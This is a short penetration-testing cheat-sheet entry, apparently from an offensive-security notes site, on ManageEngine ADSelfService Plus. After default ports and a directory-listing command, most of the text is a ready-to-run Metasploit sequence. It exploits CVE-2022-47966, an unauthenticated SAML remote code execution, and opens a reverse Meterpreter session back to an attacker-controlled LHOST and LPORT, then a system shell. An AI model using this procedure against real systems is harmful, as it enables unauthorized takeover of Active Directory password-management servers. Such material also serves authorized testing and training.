ManageEngine ADSelfService Plus PrivEsc
Last modified: 2023-04-16
ADSelfService Plus is an integrated Active Directory Self-Service Password Management and Single Sign-on Solution that reduces password-related help desk calls. Default ports are 8888 (http) and 9251 (https).
Directories
dir -Force \Program Files (x86)\ManageEngine\ADSelfService Plus\
Unauthenticated SAML RCE (CVE-2022-47966)
msfconsole
msf> use exploit/multi/http/manageengine_adselfservice_plus_saml_rce_cve_2022_47966
msf> set GUID 43ae36f51da65753530a64b37a510a53
msf> set ISSUER_URL http://example.com/adfs/services/trust
msf> set RHOSTS <target-ip>
msf> set RPORT 9251
msf> set LHOST <local-ip>
msf> set LPORT 4444
msf> run
meterpreter> shell